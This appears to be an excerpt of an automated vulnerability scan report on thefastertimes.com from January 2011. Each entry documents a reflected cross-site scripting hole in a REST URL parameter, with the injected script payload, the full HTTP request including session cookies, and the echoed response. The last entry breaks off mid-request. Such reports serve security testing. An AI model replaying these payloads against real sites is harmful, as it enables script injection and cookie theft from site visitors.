1.99. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970f5"><script>alert(1)</script>d569fa43d1a was submitted in the REST URL parameter 4. This input was echoed as 970f5\"><script>alert(1)</script>d569fa43d1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01970f5"><script>alert(1)</script>d569fa43d1a/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:51:34 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:51:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01970f5\"><script>alert(1)</script>d569fa43d1a/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimag
...[SNIP]...

1.100. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e25d"><script>alert(1)</script>4b752dcaa3 was submitted in the REST URL parameter 5. This input was echoed as 6e25d\"><script>alert(1)</script>4b752dcaa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/256e25d"><script>alert(1)</script>4b752dcaa3/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:53:31 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:53:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/256e25d\"><script>alert(1)</script>4b752dcaa3/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesi
...[SNIP]...

1.101. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc0c"><script>alert(1)</script>36af2f7b086 was submitted in the REST URL parameter 6. This input was echoed as acc0c\"><script>alert(1)</script>36af2f7b086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffmanacc0c"><script>alert(1)</script>36af2f7b086/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:55:01 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:55:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffmanacc0c\"><script>alert(1)</script>36af2f7b086/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20
...[SNIP]...

1.102. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c7fd"><script>alert(1)</script>11e110c29ff was submitted in the REST URL parameter 7. This input was echoed as 7c7fd\"><script>alert(1)</script>11e110c29ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%207c7fd"><script>alert(1)</script>11e110c29ff/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:01:02 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:01:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
ut type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%207c7fd\"><script>alert(1)</script>11e110c29ff/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%
...[SNIP]...

1.103. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca9a"><script>alert(1)</script>61ce310421e was submitted in the REST URL parameter 8. This input was echoed as 7ca9a\"><script>alert(1)</script>61ce310421e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C7ca9a"><script>alert(1)</script>61ce310421e/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:04:19 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:04:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C7ca9a\"><script>alert(1)</script>61ce310421e/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefaster
...[SNIP]...

1.104. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11c5a"><script>alert(1)</script>c3fd7bce4e6 was submitted in the REST URL parameter 9. This input was echoed as 11c5a\"><script>alert(1)</script>c3fd7bce4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:11c5a"><script>alert(1)</script>c3fd7bce4e6/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
